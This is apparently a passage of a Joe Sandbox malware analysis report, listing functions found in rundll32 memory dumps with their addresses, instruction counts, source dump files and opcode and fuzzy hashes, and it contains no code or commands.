                                                                                                                                                                                                                                                                                                                                    • Opcode ID: 8c1bbc4b90a52cd399311bb22ebfd898a5d7c13385dd3208f657a3955d367d0c
                                                                                                                                                                                                                                                                                                                                    • Instruction ID: 77c2ff2d85bcf8394657886e37443ca4ded4c0f681aed43e811881fbd5ddbe92
                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8c1bbc4b90a52cd399311bb22ebfd898a5d7c13385dd3208f657a3955d367d0c
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 03319C5245F3E06FEB03AB389AB54DA7FB19D4325470A01D7D0C0CE0A7E5588A9CC3AA
                                                                                                                                                                                                                                                                                                                                    Function 06D4F6A8 Relevance: .1, Instructions: 103COMMON
                                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 00000004.00000003.1731306609.0000000006D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D40000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_3_6d40000_rundll32.jbxd
                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                                                    • Opcode ID: a578a2fc764669129923db96f799e7210bf5e9bfb45775a682d8691244384275
                                                                                                                                                                                                                                                                                                                                    • Instruction ID: 891c48c2067bee37ffe06d8f23900e13d03765d414fdc27e87df53283783993a
                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a578a2fc764669129923db96f799e7210bf5e9bfb45775a682d8691244384275
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D241C030B042568FCB15DB28D888A6EBBF7AFC9210B04456DE646C7365DB74EC49CB50
                                                                                                                                                                                                                                                                                                                                    Function 06D4B080 Relevance: .1, Instructions: 103COMMON
                                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 00000004.00000003.1731306609.0000000006D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D40000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_3_6d40000_rundll32.jbxd
                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                                                    • Opcode ID: 6a8b576a87a2d6b3d103dc3de118ce349ba168a2409d42c71a49f5b2f9382a11
                                                                                                                                                                                                                                                                                                                                    • Instruction ID: 4f4c4a586d9bc543924a6fb53476601fb863636be3875d676d6332e005ac087d
                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6a8b576a87a2d6b3d103dc3de118ce349ba168a2409d42c71a49f5b2f9382a11
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 13319036B001068FCB50DFA9D984AAAF7EAEF94261B14C167E519C7355DB71EC01CBA0
                                                                                                                                                                                                                                                                                                                                    Function 06D4105B Relevance: .1, Instructions: 92COMMON
                                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 00000004.00000003.1731306609.0000000006D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D40000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_3_6d40000_rundll32.jbxd
                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                                                    • Opcode ID: f94a3c66ee4dc9058306de980221f68eb26fa856ca6232b5ec4151f0a8ec5d0c
                                                                                                                                                                                                                                                                                                                                    • Instruction ID: 7058a9780043fb6e7b3537c98f6cbcf31e8e386b304f96b68db45dbd6cab6218
                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f94a3c66ee4dc9058306de980221f68eb26fa856ca6232b5ec4151f0a8ec5d0c
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4A214C31A053949FEB51AF759D507FABFAADF89240F04406BD942C7381DA24CD89CBA1
                                                                                                                                                                                                                                                                                                                                    Function 06D4310C Relevance: .1, Instructions: 92COMMON
                                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 00000004.00000003.1731306609.0000000006D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D40000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_3_6d40000_rundll32.jbxd
                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                                                    • Opcode ID: d3aa42f0bb57969225e97ab0f7dc10118fce252d02fceb4faf1f36b7842728f6
                                                                                                                                                                                                                                                                                                                                    • Instruction ID: a2d0871693cbe11b9ca5d32dd44247a1f8c5719a989a44bb7a74c347fcbf16b7
                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d3aa42f0bb57969225e97ab0f7dc10118fce252d02fceb4faf1f36b7842728f6
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 30217C316463986FDB813B6E7C147FA7F59DF42220F118466FE9896151CE358C94C7A0
                                                                                                                                                                                                                                                                                                                                    Function 06D4C558 Relevance: .1, Instructions: 87COMMON
                                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 00000004.00000003.1731306609.0000000006D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D40000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_3_6d40000_rundll32.jbxd
                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                                                    • Opcode ID: 86213f361db00105c2efe729911e5a502313934ea9a8ff25dde02cdead5413cb
                                                                                                                                                                                                                                                                                                                                    • Instruction ID: 0e7c366d74f1f3fbaf25bb3d1456ca3232465620a0c9f692c26be520d83b0e57
                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 86213f361db00105c2efe729911e5a502313934ea9a8ff25dde02cdead5413cb
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6131AF34210602CFC321DF24E594926FBF2FF89310718CAA8D58A8B766CB34EC46CB90
                                                                                                                                                                                                                                                                                                                                    Function 06D428F8 Relevance: .1, Instructions: 80COMMON
                                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 00000004.00000003.1731306609.0000000006D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D40000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_3_6d40000_rundll32.jbxd
                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                                                    • Opcode ID: f28af310041368cc09c5f689546c7dc538a3cea8e69015ac69624146fa3b0613
                                                                                                                                                                                                                                                                                                                                    • Instruction ID: 518f88de7736561a5bb018b3c81a183c8ec9338e58ede968c62365b789cfe2e1
                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f28af310041368cc09c5f689546c7dc538a3cea8e69015ac69624146fa3b0613
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F3215C3154E3E45FD703AB38AD6168A7FB4DE43200B1A40D7D0C0CF1A7DA28995DC7AA
                                                                                                                                                                                                                                                                                                                                    Function 06D4B598 Relevance: .1, Instructions: 75COMMON
                                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 00000004.00000003.1731306609.0000000006D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D40000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_3_6d40000_rundll32.jbxd
                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                                                    • Opcode ID: e5931ace90d9eb58ecac14ab0d915c04acd1cc28205b6017f02a90847b466494
                                                                                                                                                                                                                                                                                                                                    • Instruction ID: 91585772effb31c6addfb1b2e620cff4cd3c8cd2f19410508cd58cb0aede2aef
                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e5931ace90d9eb58ecac14ab0d915c04acd1cc28205b6017f02a90847b466494
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8621CF34B00219CFDB54AF75E848A7A7BA6EB84311F109576E9058B394DF71EC42CB90
                                                                                                                                                                                                                                                                                                                                    Function 0467D6A4 Relevance: .1, Instructions: 75COMMON
                                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1732076335.000000000467D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0467D000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_467d000_rundll32.jbxd
                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                                                    • Opcode ID: 9bc1f7ec1a09fc1ffd6dbe3f82b124c00ad6c477522e485e647d451b2860fa75
                                                                                                                                                                                                                                                                                                                                    • Instruction ID: f97cc71d8f70f12f8c4ca1cdfd8fd7eb99c24124849f3c951738f4215916d56a
                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9bc1f7ec1a09fc1ffd6dbe3f82b124c00ad6c477522e485e647d451b2860fa75
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: EB210375604240DFCB05DF14D9C0B2ABF65FF94324F20C969E9094B256E336E456CAA1
                                                                                                                                                                                                                                                                                                                                    Function 06D4B930 Relevance: .1, Instructions: 72COMMON
                                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 00000004.00000003.1731306609.0000000006D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D40000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_3_6d40000_rundll32.jbxd
                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                                                    • Opcode ID: bf3f9e48b3dd15422929e6149772389873ba739b34961f9acebf18d13705c8d0
                                                                                                                                                                                                                                                                                                                                    • Instruction ID: 14dd2125f5a60f50bcb0b2b04762903acf5c65d8f19866a7503971d41726d424
                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: bf3f9e48b3dd15422929e6149772389873ba739b34961f9acebf18d13705c8d0
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A31186327546014FDB94DB1ED490A2BF7DBEFE8260714803BA94AC7354EE72EC018790
                                                                                                                                                                                                                                                                                                                                    Function 06D43A29 Relevance: .1, Instructions: 71COMMON
                                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 00000004.00000003.1731306609.0000000006D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D40000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_3_6d40000_rundll32.jbxd
                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                                                    • Opcode ID: 96e8eaf6c3fb61b5576cb502facfde731f06697d2779e41ba7641ee857e9647b
                                                                                                                                                                                                                                                                                                                                    • Instruction ID: 4268f5005a9e4914fdac4e780a744649208e2ce932d3245147bc495e97c5b7c5
                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 96e8eaf6c3fb61b5576cb502facfde731f06697d2779e41ba7641ee857e9647b
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5C219230A441059FDB44EB6AD855AEDBFB3EF88314F148028D844A7380CF759C49CBA0
                                                                                                                                                                                                                                                                                                                                    Function 06D44553 Relevance: .1, Instructions: 69COMMON
                                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 00000004.00000003.1731306609.0000000006D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D40000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_3_6d40000_rundll32.jbxd
                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                                                    • Opcode ID: 6d720c027bb336ef4f1991e37db0dd90866edef3e554b43e48ba90506da1bb39
                                                                                                                                                                                                                                                                                                                                    • Instruction ID: 45c57da57b34c7dff6b5c9c2d2d90f0684d131f7fff8d2c3296e742e8c06a3ed
                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6d720c027bb336ef4f1991e37db0dd90866edef3e554b43e48ba90506da1bb39
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 521104313042064FCB11AB6CE94456ABFE6DFC9360315452EE58ACB315DF30ED85C7A4
                                                                                                                                                                                                                                                                                                                                    Function 06D430FC Relevance: .1, Instructions: 67COMMON
                                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 00000004.00000003.1731306609.0000000006D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D40000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_3_6d40000_rundll32.jbxd
                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                                                    • Opcode ID: 53878edfd9dccfe9f4dab9a1eb09216002c13c9b4cd59a153413fbfa5099ab4a
                                                                                                                                                                                                                                                                                                                                    • Instruction ID: d0a16c2681bfd60e485f67e7a72cfafb7cd92517fc388d49cd0137f1f514ce82
                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 53878edfd9dccfe9f4dab9a1eb09216002c13c9b4cd59a153413fbfa5099ab4a
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 89110620B193981BEB95337E691437E6FAACF82710F1644AADD82CB786DD94CC0483E5
                                                                                                                                                                                                                                                                                                                                    Function 06D42258 Relevance: .1, Instructions: 66COMMON
                                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 00000004.00000003.1731306609.0000000006D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D40000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_3_6d40000_rundll32.jbxd
                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                                                    • Opcode ID: 2829b889910889100d34fe538cbcd82f323441ee2fde192f695463e6a105c67b
                                                                                                                                                                                                                                                                                                                                    • Instruction ID: afc16da6576a8381a3dae58aeb81978659d961daee62eff38c25c321a1fcdbde
                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2829b889910889100d34fe538cbcd82f323441ee2fde192f695463e6a105c67b
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A0211A75A102189FCB94DF69D88499EBBF6FF8C710F10852AE915EB320DB319941CFA0
                                                                                                                                                                                                                                                                                                                                    Function 06D4A219 Relevance: .1, Instructions: 62COMMON
                                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 00000004.00000003.1731306609.0000000006D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D40000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_3_6d40000_rundll32.jbxd
                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                                                    • Opcode ID: 1c59b8789aaf0faf3fea623f2e275fc3d50f97b7c3485f164cb3a4f3fc4038dc
                                                                                                                                                                                                                                                                                                                                    • Instruction ID: 9920c5050085a11c802548efa83068db7c8edf479df9a9c60d957c5582ccb308
                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1c59b8789aaf0faf3fea623f2e275fc3d50f97b7c3485f164cb3a4f3fc4038dc
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 31214A34A402099FDB24DF96C584B9ABBF5EF8C710F258059E945BB344CB71ED45CBA0
                                                                                                                                                                                                                                                                                                                                    Function 06D4576F Relevance: .1, Instructions: 60COMMON
                                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 00000004.00000003.1731306609.0000000006D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D40000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_3_6d40000_rundll32.jbxd
                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                                                    • Opcode ID: 73e4cd781bb0fb93eb91373dd10feb125a932a4723f0196ecdb6555f617fbb8c
                                                                                                                                                                                                                                                                                                                                    • Instruction ID: ea10dd1b4205f3fd01d45f6e5ecb58445accb5ae61089ca490b7d13d0f405f4a
                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 73e4cd781bb0fb93eb91373dd10feb125a932a4723f0196ecdb6555f617fbb8c
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1711443590E7808FD753AB686D1054A7FAAAE82210318C5BBD0C9CF257DA649C0DC7B1
                                                                                                                                                                                                                                                                                                                                    Function 06D43A38 Relevance: .1, Instructions: 59COMMON
                                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 00000004.00000003.1731306609.0000000006D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D40000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_3_6d40000_rundll32.jbxd
                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                                                    • Opcode ID: 21fc3bb67e391186b095baaa05efb43d667678a20eb79d4b33a337d97e622807
                                                                                                                                                                                                                                                                                                                                    • Instruction ID: 136a62c7b4af5c0c6bdaa5130b259c795a9200101bf29bff32b207475db3b670
                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 21fc3bb67e391186b095baaa05efb43d667678a20eb79d4b33a337d97e622807
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D4117230A44105AFDB44EB69DC51AAE7BB7EF8C314F148025D805A7390CF759C49CBA0
                                                                                                                                                                                                                                                                                                                                    Function 06D4AAE0 Relevance: .1, Instructions: 56COMMON
                                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 00000004.00000003.1731306609.0000000006D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D40000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_3_6d40000_rundll32.jbxd
                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                                                    • Opcode ID: 16e2cf97a89e5eb66610297febad7ff501d100adae8e2c63931f3496384f9a77
                                                                                                                                                                                                                                                                                                                                    • Instruction ID: 14095f4ec4683317a055ebe93366e1cb85d2f45464cebcd05b4b46479e5fe4fa
                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 16e2cf97a89e5eb66610297febad7ff501d100adae8e2c63931f3496384f9a77
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0921D674E0020DDFCF44EFA8D5849AEBBF2EF89314F504599E445A7354DA34AE40CB91
                                                                                                                                                                                                                                                                                                                                    Function 06D41378 Relevance: .1, Instructions: 56COMMON
                                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 00000004.00000003.1731306609.0000000006D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D40000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_3_6d40000_rundll32.jbxd
                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                                                    • Opcode ID: 10e1fcb4aa6c799d77411a524c0b19895ca975bb8c68e4519803f80ed57a99f4
                                                                                                                                                                                                                                                                                                                                    • Instruction ID: 2777085ae1c92b35fe07ce76fbbd01d2e298e95425856ad7b7a78178cd8ce453
                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 10e1fcb4aa6c799d77411a524c0b19895ca975bb8c68e4519803f80ed57a99f4
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0D2102B0D002498FDB10DFAAC984AEEFBF4FF88324F10852AD859A7250C7746945CFA5
                                                                                                                                                                                                                                                                                                                                    Function 0467D69F Relevance: .1, Instructions: 56COMMON
                                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1732076335.000000000467D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0467D000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_467d000_rundll32.jbxd
                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                                                    • Opcode ID: 402c6a8559748647fef594cd0c7d6ed57cea98399c5c457cfc3d558c3163147f
                                                                                                                                                                                                                                                                                                                                    • Instruction ID: 01eb8366b46d94bb331e4e5ea2ea9be71e1c315c397a8fb93fe75fd55645e4bc
                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 402c6a8559748647fef594cd0c7d6ed57cea98399c5c457cfc3d558c3163147f
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: DA11E176504280CFCB02CF10D9C4B16BF71FF94324F24C6A9D8090B216C336E45ACBA2
                                                                                                                                                                                                                                                                                                                                    Function 06D41380 Relevance: .1, Instructions: 53COMMON
                                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 00000004.00000003.1731306609.0000000006D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D40000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_3_6d40000_rundll32.jbxd
                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                                                    • Opcode ID: 54c1f2a75f1245fd8bd9e33994d7ed3b21c7dcd43e37dfa95ba7333671bf12d6
                                                                                                                                                                                                                                                                                                                                    • Instruction ID: 97c3a4347fbf0a3d43620857c843347e81c06a649cb5d7d267286e8c2032b68c
                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 54c1f2a75f1245fd8bd9e33994d7ed3b21c7dcd43e37dfa95ba7333671bf12d6
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A911F2B1D042498FDB10DFAAC984AEEFBF4FF88324F10842AD45967250C774A945CFA5
                                                                                                                                                                                                                                                                                                                                    Function 06D42998 Relevance: .1, Instructions: 52COMMON
                                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 00000004.00000003.1731306609.0000000006D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D40000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_3_6d40000_rundll32.jbxd
                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                                                    • Opcode ID: fddb4c8f6b5db52616b2e225f8eb2441517957b4f32a58fa5eea0e5c5f33d169
                                                                                                                                                                                                                                                                                                                                    • Instruction ID: 058de3282122119929a08a9182557e7c05b1718c99d05c30fcb46ea1ae910460
                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: fddb4c8f6b5db52616b2e225f8eb2441517957b4f32a58fa5eea0e5c5f33d169
